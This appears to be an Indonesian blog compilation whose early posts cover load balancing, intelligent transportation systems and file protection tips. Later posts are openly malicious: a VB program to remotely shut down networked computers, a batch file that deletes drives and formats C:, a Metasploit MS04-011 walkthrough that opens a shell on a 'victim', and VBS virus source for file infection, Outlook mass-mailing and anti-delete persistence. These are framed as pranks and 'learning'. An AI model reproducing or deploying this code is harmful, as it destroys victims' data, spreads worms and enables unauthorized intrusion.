Sangat jelas bahwa SLB digunakan untuk mengatasi masalah redudansi, skalabiliti, dan manajemen yang diinginkan. Web Sites saat ini terus tumbuh semakin banyak. Saat ini downtime adalah asosiasi dengan sebuah ukuran rupiah. Beberapa situs kehilangan jutaan rupiah setiap menitnya hanya karena server mengalami down. SLB dibutuhkan untuk mengatasi hal ini. Load Balancing bekerja dengan trafik yang diarahkan pada situs. Satu URL, satu IP Address, dan load lancing digunakan untuk mendistribusikannya dengan baik. SLB memiliki beberapa keuntungan diantaranya adalah :

Fleksibel

dengan SLB kita dapat menambah atau mengurangi jumlah server pada site kita setiap saat. Keuntungan dari sistem ini adalah perawatan pada mesin dapat dilakukan dengan benar. SLB juga dapat mengarahkan trafik pada cookies, URL parsing, algoritma statik dan dinamis dan masih banyak lagi.

Availability Tinggi

SLB dapat melakukan pengecekan status available sebuah server, mengontrol server yang tidak merespon rotasi dan mengembalikannya pada rotasi sehingga berfungsi kembali. Dilakukan secara otomatis tanpa memerlukan intervensi dari administrator.

Load balancer dimulai dari perangkat berbasis PC, tapi sekarang fungsi loadbalancing juga dapat dilakukan pada switch atau router.

Teknologi Lainnya

SLB bekerja dengan melakukan manipulasi tujuan paket jaringan untuk server. Ada beberapa teknologi lain yang dapat digunakan sama dengan SLB diantaranya adalah sebagai berikut :

Firewall Load Balancing (FWLB)

Firewall Load Balancing (FWLB) dikembangkan untuk mengatasi beberapa keterbatasan pada teknologi Firewall. Sebagian besar Firewall adalah berbasis CPU seperti mesin SPARC atau mesin x86 based. Karena prosesor memiliki keterbatasan, throughput firewall pun menjadi terbatas.Kecepatan prosesor, konfigurasi, dan beberapa metric menjadi factor kinerja firewall. Seperti pada SLB, FWLB memungkinkan implementasi beberaa firewall di sharing dan di load sama halnya seperti SLB. Namun karena trafik yang berbeda maka konfigurasi dan teknologinya pun sedikit berbeda. Konfigurasi umumnya adalah seperti berikut :

Global Server Load Balancing

Global Server Load Balancing (GSLB) juga memiliki konsep yang sama dengan SLB hanya saja digunakan untuk distribusi pada lokasi yang lebih luas. SLB bekerja pada LAN (Local Area Network), sedangkan GSLB bekerja pada Wide Area Network (WAN). Ada beberapa cara untuk mengimplemetasikan GSLB seperti DNS based dan BGP based (Border Gateway Protocol). Berikut ini adalah contoh konfigurasi dasar GSLB :

Clustering

Clustering memberikan yang sama seperti halnya pada SLB yakni memberikan availability yang tinggi dan skalabiliti dengan sedikit perbedaan. Clustering melibatkan software protocol (proprietary dari masing-masing vendor) yang berjalan pada beberapa server dengan tujuan untuk melakukan sharing load (seperti pada gambar dibawah). Cluster berada didepan beberapa server kemudian melakukan manipulasi paket pada network device dan menerima trafik kemudian membaginya pada server lainnya. Ada integrasi yang kuat dengan software server.

tks to referensi: Tony Bourke, Server Load Balancing, O’Rielly.

Instalasi, Networking, Site Survey, WLAN

Intelligent Transportation System (ITS)

Pada tahun 1988, OECD (Oraganitation for Economic Coorporation and Development) di Paris merupakan organisasi pertama yang menyatakan bahwa negara-negara maju setiap tahunnya kehilangan millyaran dolar Amerika dari bidang transportasi hanya karena pengemudi tidak mempunyai cukup informasi yang terkait mengenai navigasi [Krakiwsky, 1993]. IVHS AMERIKA (1992) adalah organisasi pertama yang mengkuantifikasi pernyataan OECD tersebut. Dalam laporannya, IVHS AMERIKA melaporkan bahwa pada tahun 1991 di Amerika Serikat 41.000 meninggal akibat kecelakaan lalu lintas, dan lebih dari 5 juta orang terluka. Disamping itu kemacetan lalu lintas dipersalahkan sebagai faktor penghiang produktifitas kerja yang diestimasi merugikan Amerika Serikat sebesar 100 milyar dillar per tahun. Disamping itu kecelakaan-kecelakaan lalu lintas, yang sebagaiannya terkait dengan kemacetan lalu lintas, mengkontribusikan kerugian lainya yang diestimasi sebesar 70 milyar dollar per tahun. Setelah mempelajari karakterisrik persoalan tersebut, IVHS AMERIKA kemudian menyimpulkan bahwa sistem navigasi IVHS (Intelligent Vehicle Highway systems), sekarang dinamakan ITS (Intelligent Transportation Systems) dapat digunakan untuk menyelesaikan permasalahan diatas. ITS memadukan antara faktor manusia (people), jalan (road), dan kendaraan (vehicles) dengan memanfaatkan stade of the art teknologi informasi.

ITS merupakan sintesa dari beberapa teknologi seperti penentuan posisi, komunikasi, sistem informasi, kontrol dan elektronik. Dalam kaitannya dengan teknologi pendukung ITS, GPS biasanya berperan sebagai teknologi penentuan posisinya dan GIS (Geographic Information System) berperan sebagai teknologi sistem informasinya [Arronoff, 1989; Autenucci et al.,1991]. Sistem navigasi ITS dapat diklasifikasikan dalam empat tipe yaitu : Autonomous ITS, Fleet Management ITS, Advisory ITS dan Inventory ITS.

Sistem Autonomous ITS terdiri dari sistem penentuan posisi dan sistem peta elektronik yang ditempatkan pada kendaraan dan dimaksudkan untuk memberikan kemampuan navigasi yang lebih baik bagi pengemudi kendaraan yang bersangkutan. Sarana ini tidak mempunyai komunikasi dengan sistem luar kendaraan kecuali kalau menggunakan GPS untuk penentuan posisinya dimana dalam hal ini diperlukan antena untuk menerima sinyal GPS.

Fleet Management ITS berfungsi untuk mengelola kendaraan dari pusat pengontrol (dispatch center) melalui hubungan komunikasi. Dalam sistem ini kendaraan-kendaraan yang bersangkutan diperlengkapi dengan sistem penentuan posisi dan umumnya mereka tidak diperlengkapi dengan sistem peta elektronik. Kendaraan-kendaraan tersebut melaporkan posisinya kepusat pengontrol sehingga pusat pengontrol mempunyai kemudahan untuk mengelola pergerakan kendaraan tersebut. Disamping memberikan instruksi-instruksi mengenai pengarahan, pusat pengontrol juga bertanggung jawab memberikan informasi-informasi yang diperlukan oleh pengemudi kendaraan sepeti informasi cuaca dan keadaan lalu lintas.

Untuk Advisory ITS system menggabungkan aspek penentuan posisi dan sistem peta elektronik dari sistem autonomous ITS dengan aspek komunikasi dari arsitektur sistem fleet management ITS, Sistem advisory ITS adalah autonomous dalam artian bahwa sistem ini tidak di kontrol oleh suatu pusat pengontrol (dispatch center), tetapi pada saat yang sama sistem ini merupakan bagian dari armada kendaraan yang mendapat pelayanan dari pusat informasi lalu lintas. Pada beberapa sistem advisory ITS, kendaraan – kendaraan tertentu berdiri sendiri sebagai traffic probes, yang memberikan kendaraan-kendaraan lainnya (yang tidak terdefinisikan oleh pusat informasi lalu lintas) informasi-informasi terbaru tentang kondisi lalu lintas dan cuaca.

Yang terakhir adalah Inventory ITS System. Sistem ini biasanya terdiri atas kendaraan yang berdiri sendiri dan dilengkapi dengan kamera video digital untuk mengumpulkan data (lengkap dengan koordinat dan waktu pengambilan) yang terkait dengan jalan; yang diperlukan antara lain untuk keperluan inventarisasi jalan, pemeliharaan jalan, serta penyelidikan objek-objek pengganggu lalu lintas. Kendaraan – kendaraan yang digunakan juga diperlengkapi dengan alat penentuan posisi, data logger, serta pendisplay data dalam bentuk peta elektronik.


tks to : dennycharter

Saturday, February 27, 2010

Cara clasic XP mengamankan data di kompy kamu ...

Repot memang jika satu komputer digunakan banyak orang. Anda mungkin menyimpan file-file rahasia yang tak ingin orang lain membacanya. Bagaimana mengamankan file dan folder itu dari tangan-tangan jahil?

Jika Anda merasa repot melindunginya secara manual, program-program pelindung file/folder bisa menjadi alternatif pilihan Anda. Program-program tersebut bisa diunduh di Internet. Berikut beberapa software yang bisa Anda gunakan untuk mengamankan file dan folder Anda.

1. Folder Lock
Sistem operasi Windows memang menyediakan fasilitas penyembunyi folder. Sayangnya banyak orang yang sudah mengerti bagaimana membuatnya menjadi tak tersembunyi lagi. Folder Lock mungkin bisa menjadi alternatif pilihan.

Folder Lock merupakan software pengunci folder. Program ini muncul sekitar 2 tahun yang lalu. Fungsinya hampir sama seperti gembok. Folder Lock akan memunculkan kotak dialog untuk mengisi password setiap file yang diklik. Tak hanya mengunci, file yang dilindungi pun akan menjadi tersembunyi. Fasilitas yang ditawarkan juga beragam, mulai dari perlindungan dari virus, mengenkripsi dan mengacak data.

Aplikasi ini berukuran 1,82 MB dan dapat berjalan pada platform Windows 98/ME/NT/2000/XP. Program ini bisa diperoleh melalui situs www.newsoftwares.net/folderlock. Sayangnya program tersebut merupakan shareware yang tidak gratis karena Anda harus mengeluarkan kocek US$35 untuk mendapatkannya.

2. Cryptainer LE 5.0.1
Software ini akan membuatkan Anda kontainer data atau folder yang digunakan untuk menyimpan berbagai ragam data. Anda tinggal memasukkan file-file yang akan dienkripsi ke dalam folder tersebut. Tidak hanya bisa bekerja di PC (komputer), program ini juga bisa digunakan dalam media penyimpanan lain seperti USB Drive, CD ROM, Flash Disk dan lainnya.

Selain berfungsi melindungi data, software ini juga mampu melindungi e-mail. Anda bisa mendapatkan software ini secara cuma-cuma alias gratis melalui situs http://www.cypherix.co.uk/cryptainerle/. Sama seperti Folder Lock, program ini bisa berjalan pada platform Windows 98/ME/NT/2000/XP

3. MySecretFolder
Software ini memberikan opsi pada pengguna untuk memilih fitur menyembunyikan direktori atau perlindungan folder dengan password. Opsi pertama hanya menyembunyikan saja tanpa pemberian password. Opsi kedua hanya memberikan perlindungan file dengan password saja.

Aplikasi ini dapat berjalan pada platform Windows 98, ME, 2000, Server 2003 dan Windows XP. Untuk pengunduhan, dukungan dan update, dapat diakses melalui situs http://www.my-secret-folder.com/.

4. FileGhost
FileGhost merupakan salah satu tool keamanan yang bisa digunakan untuk memproteksi file atau folder. Dengan program ini, secara aman Anda bisa mengunci, menyembunyikan, menolak (deny) file reading, file writing, mencegah langkah penghapusan file (deleting), penyalinan (copying), pemindahan (moving, pengubahan nama file/folder (renaming) dan replacing.

Program perlindungan ini juga bisa diaplikasikan pada file, folder, volume hard disk, CD/DVD-ROM, flash card atau media penyimpanan lain, tanpa memperhatikan file system yang digunakan (FAT atau NTFS).

Program ini juga sangat user friendly dan mudah digunakan. Cukup dengan men-drag and drop file Anda dan mengatur pengecekan yang diinginkan, maka program perlindungan akan segera bekerja. Dengan FileGhost, Anda tidak hanya bisa melindungi data penting Anda dari orang lain, tetapi juga dari program jahat seperti virus, trojan, spyware dan program jahat lainnya.

Soal platform, program ini berjalan pada Windows 2K/XP/2K3. Sayangnya, program ini tidak gratis. Namun untuk coba-coba saja, program ini disediakan gratis.


Cara Manual

Kalau Anda malas menggunakan software, berikut beberapa cara manual yang bisa Anda coba untuk melindungi file/folder.

A. Memproteksi file Word/Excel.

Langkah-langkahnya:
1. Bukalah file Word atau Excel yang ingin Anda lindungi.
2. Pada menu toolbar, pilihlah menu Tools kemudian pilih Options dan masuk ke menu Security.
3. Setelah Anda memasuki Security, akan muncul box dimana Anda akan diminta untuk mengetikkan password untuk melindungi file.
4. Pada sebelah kanan box tadi, terdapat menu Advanced. Jika Anda menginginkan kata kunci yang diisikan terenkripsi dengan lebih kuat, pilihlah menu ini. Pada menu Advanced, terdapat pilihan enkripsi mulai dari yang paling lemah yakni "Weak Encryption", yang bekerja dengan operasi XOR. Level ini tidak ada pilihan panjang kata kunci.

Kemudian selevel lebih tinggi terdapat enkripsi mode "Office 97/2000 Compatible" untuk standar perlindungan file. Level selanjutnya bervariasi namun tetap dengan metode enkripsi RC4. Pada level ini, Anda sudah bisa mengisikan panjang kata kunci dengan minimal 40 hingga 128 huruf. Berbagai teknik enkripsi ditawarkan, mulai dari DSS, RSA dan AES.

5. Klik OK untuk memilih tipe enkripsi dan Anda akan kembali ke tampilan awal Security.
7. Selain itu, masih terdapat box untuk mengisikan kata kunci yang akan menawarkan pada Anda untuk perlindungan modifikasi file, apakah file tersebut dapat diubah atau hanya read-only. Rekomendasi kami, isilah box ini demi keamanan yang lebih kuat.
8. Klik OK, lalu akan muncul kotak dialog yang meminta Anda untuk mengisikan kembali kata kunci untuk membuka dan memodifikasi file.
9. Anda akan kembali pada file anda. Jangan lupa untuk menyimpannnya terlebih dahulu sebelum Anda menutupnya agar pengaruh pemberian kata kunci tadi berkhasiat.

Bagaimana jika ingin menghilangkan perlindungan tadi? Caranya:
1. Buka kembali file tersebut
2. Masuk ke bagian Security dan hapus kata kunci pada box yang telah anda isikan.
3. Klik OK
4. Kembali ke file dan simpan kembali file tersebut.

B. Melalui Regedit

Cara ini memang kurang populer jika dibandingkan dengan kinerja software yang lebih mudah. Langkahnya:
1. Klik Start > Run, lalu ketikkan regedit kemudian tekan Enter.
2. Anda akan digiring ke file HKEY_CURRENT_USER. Lalu dari HKEY_CURRENT_USER pilih Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Di window sebelah kanan akan terdapat "NoFolderOptions". Dobel klik NoFolderOptions, Data Type: REG_DWORD. Yang 'diakali' disini adalah bagian datanya. Data: (0 = disabled, 1 = enabled/sembunyikan). Jika Anda meng-enable setting ini, maka menu Folder Options yang terdapat pada Start Menu - Setting akan hilang.

Bagaimana cara memunculkan folder option kembali? Berikut langkahnya:
1. Buka menu RUN
2. ketikan gpedit.msc
3. buka user configuration
4. buka administrativ temple
5. buka Windows componen
6. buka windows explorer
7. cari menu Remove the Folder Options menu item from the tools menu
8. klik 2x lalu pilih disable OK Coba buka My Computer lihat di tab Tool pasti Folder Optionsnya sudah muncul kembali.


tks for:Detik Portal & http://www.ketok.com/

Buat program kecil di VB untuk matikan kopy orang yang satu jaringan. Mau Nakal pun harus belajar pemograman huh ..!!

Bandal-bandal harus terarah juga yea . . . (Gaya Anak Medan)
Di kampus da mulai belajar VB, iseng iseng buat program ecek2 yang penting maknyuss. belajarnya dri om google jg sih, habis di kampus ga diajarin yang kaya gianian kwkw... XD
oya sebelum na kamu uda ngerti dikit2 soal VB kan ? pasti na dong, yauda dh langsung aj kita oprek VB na!!! Zuuuuzzsssssssss .........

Project : Shutdown.vb
Form : frm.shutdown.frm
Kontrol penting : 1 label, 1 Text box untuk menuliskan IP, dan 1 tombol Command.

Untuk source kode frmShutdown nya tunggu dulu ya, saya masih ngetik nih belum selesai…. Beberapa hari lagi tinggalin alamat email aja kalau mau ntar saya kirim via email…
Berikut adalah source code frmShutdown:

Option Explicit

Private Type WSADATA
wVersion As Integer
wHighVersion As Integer
szDescription(0 To 256) As Byte
szSystemStatus(0 To 128) As Byte
imaxsockets As Integer
imaxudp As Integer
ipszvenderinfo As Long
End Type

Private Declare Function WSAStartup Lib “wsock32″ (ByVal VersionReq As Long, WSADataReturn As WSADATA) As String

Private Declare Function WSACleanup Lib “wsock32″ () As Long

Private Declare Function inet_addr Lib “wsock32″ (ByVals As String) As Long

Private Declare Function gethostbyaddr Lib “wsock” (haddr As Long, ByVal hnlen As Long, ByVal addrtype As Long) As Long

Private Declare Sub CopyMemory Lib “kerenel32″ Alias “RtlMoveMemory” (xDest As Any, xSource As Any, ByVal nbytes As Long)

Private Declare Function lstrlen Lib “kernel32″ Alias “lstrlenA” (lpString As Any) As Long

Private Declare Function InitiateSystemShutdown Lib “advapi322.dll” Alias “InitiateSystemShutdownA” (ByVal lpMachineName As String, ByVal lpMessage As String, ByVal dwTimeout As Long, ByVal bForceAppsClosed As Long, ByVal bRebootAfterShutdown As Long) As Long

Berikut adalah source code saat event klik Command1

Private Sub Command1_Click()
Dim name As String

name = GetHostNameFromIP(Text1.Text)
If MsgBox(”IP ” & Text1.Text & ” (” & name & “)telah ditemukan” & vbCrLf & “Jadi dimatikan?”, vbYesNo + vbQuestion, “Gotcha!!”) = vbYes Then
InitiateSystemShutdown “\\” & name, “Selamat tinggal……”, 30, True, True
End If
End Sub

Berikut ini fungsi-fungsi yang diperlukan:

Jalankan program ini dengan Ctrl+F5. Masukkan IP korban yang diinginkan tekan tombol Cari dan Matikkan!!
Apabila keadaan komputer sedang aktif maka akan ada konfirmasi Yes atau No. Tentu saja kita tekan yang Yes. Seketika komputer korban akan mati.Udah dulu ach pegel nih dia :

Public Function SocketsInitialize() As Boolean
Dim WSAD As WSADATA
SocketsInitialize = WSAStartup(&H101, WSAD) = 0
End Function

Public Function GetHostNameFromIP(ByVal sAddress As String) As String
Dim ptrHosent As Long
Dim hAddress As Long
Dim nbytes As Long

If SocketsInitialize() Then
hAddress = inet_addr(sAddress)
If hAddress <> -1 Then
ptrHosent = gethostbyaddr(hAddress, 4, 2)
If ptrHosent <> 0 Then
CopyMemory ptrHosent, ByVal ptrHosent, 4
nbytes = lstrlen(ByVal ptrHosent)
If nbytes > 0 Then
sAddress = Space$(nbytes)
CopyMemory ByVal sAddress, ByVal ptrHosent, nbytes
GetHostNameFromIP = sAddress
End If
Else
MsgBox “Error!!!!”
End If
WSACleanup
Else
MsgBox “Alamat IP salah”
End If
Else
MsgBox “Winsock Error!!”
End If
End Function


Maknyuusss .........
"kompy aku jangan kelen matiin woooyyy, dame-dame" ....... :)

Nakal format kompy orang ...

1. Buka new text document
2. ketik or copy paste cara di bawah ini :

@echo off
echo msgbox"Semua data komputer anda akan hilang untuk selamanya,
hahaha" >C:\1.vbs
C:\1.vbs
cls
DEL C:\ -y
DEL D:\ -y
DEL E:\ -y
DEL F:\ -y
DEL G:\ -y
FORMAT C:\ -y
shutdown -s -f 15 -c "LATER!"

3. Save as .BAT file
4. JANGAN DICOBA KE KOMPUTER SENDIRI
5. Double klik deh

Iseng-Iseng masuk ke kompy orang ... :P (metasploit framework-3.1)

heheheh mari berbagi

nich..cara2nya...pk metasploit framework-3.1

1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada...(tuk iseng doank
msf > show exploits

5. load modul exploit, qta gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
# Started bind handler
# Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
# Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
# Getting OS information...
# Trying to exploit Windows 5.1
# Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
# The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

# Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

13. Hehe...dah masuk tuch lol!

pergunakan dengan baik dan benar

Embarassed untuk tutor lebih jelas liat aja di sini

terus buat download mesin nya disini aja broe

manteb kali ah bisa masuk ke kopy orang ... :P

Buat yang suka ngoprek VB, File Antar Visual Basic Script (.VBS)

Nih ada beberapa SC virus pake .vbs
buat belajar, gimana sih cara sistem itu bekerja. Jangan dibuat yang aneh-aneh (gue ga bertanggung jawab / cuma sebagai pembelajaran.

Infeksi File Antar Visual Basic Script (.VBS)
Code:

On Error Resume Next
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Angel1()
Sub Angel1()
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
For Each SalinMawarPutih In a.Drives
If SalinMawarPutih.DriveType = 2 _
Or SalinMawarPutih.DriveType = 3 Then
Angel3 (SalinMawarPutih.Path & "\")
End If
Next
End Sub
Sub Angel2(FileTarget)
On Error Resume Next
Set otf = a.GetFile(WScript.ScriptFullName)
ra = otf.ReadAll
otf.Close
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.Files
FileExt = LCase(a.GetExtensionName(n.Path))
If FileExt = "vbs" Or FileExt = "vbe" Then
Set openvbs = a.OpenTextFile(n.Path, 1)
vbsra = openvbs.ReadAll
openvbs.Close
If InStr(1, vbsra, "Tips And Trik by ") = False Then
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)
RantingMawarPutih = JC.ReadAll
JC.Close
Set MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)
MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)
For i = 1 To Len(RantingMawarPutih)
Tz = Mid(RantingMawarPutih, i, 1)
Tz = Hex(Asc(Tz))
If Len(Tz) = 1 Then
Tz = "0" & Tz
End If
Gz = Gz + Tz
If Len(Gz) = 110 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
If Len(RantingMawarPutih) - i = 0 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
Next
MawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"
MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"
MawarMerah.WriteLine "WriteAppend.Close"
MawarMerah.WriteLine "Function CM(CN)"
MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"
MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"
MawarMerah.WriteLine "Next"
MawarMerah.WriteLine "End Function"
MawarMerah.Close
End If
End If
Next
End Sub
Sub Angel3(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.SubFolders
Angel2 (n.Path)
Angel3 (n.Path)
Next
End Sub



penyebaran Melalui E-mail Via Outlook
Code:

On Error Resume Next

Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set MawarMerah = MawarPutih.GetFile(WScript.ScriptFullName)
MawarMerah.Copy (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Set Attachments = MawarPutih.GetFile(MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Attachments.Attributes = 0
Set RantingMawar = CreateObject("Outlook.Application")
If Not RantingMawar = "" Then
For Each DuriMawar In RantingMawar.GetNameSpace("MAPI").AddressLists
For DaunMawar = 1 To DuriMawar.AddressEntries.Count
Set BagianEmail = RantingMawar.CreateItem(0)
BagianEmail.Recipients.Add (DuriMawar.AddressEntries(DaunMawar))
BagianEmail.Subject = "Judul Pesan"
BagianEmail.Body = "Isi Pesan"
BagianEmail.Attachments.Add (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
BagianEmail.DeleteAfterSubmit = True
BagianEmail.Send
Next
Next
End If



Anti Delete
Code:

On Error Resume Next

Set MawarPutih= Createobject("scripting.filesystemobject")
Set MawarMerah= MawarPutih.opentextfile(wscript.scriptfullname, 1)
BatangMawar= MawarMerah.readall
MawarMerah.Close
Do
If Not (MawarPutih.fileexists(wscript.scriptfullname)) Then
Set DuriMawar= MawarPutih.createtextfile(wscript.scriptfullname, True)
DuriMawar.writeBatangMawar
DuriMawar.Close
End If
Loop


semua code diatas.. bisa kalian jadiin 1.. tinggal kreasinya aja...
thx_to:Shadow Angel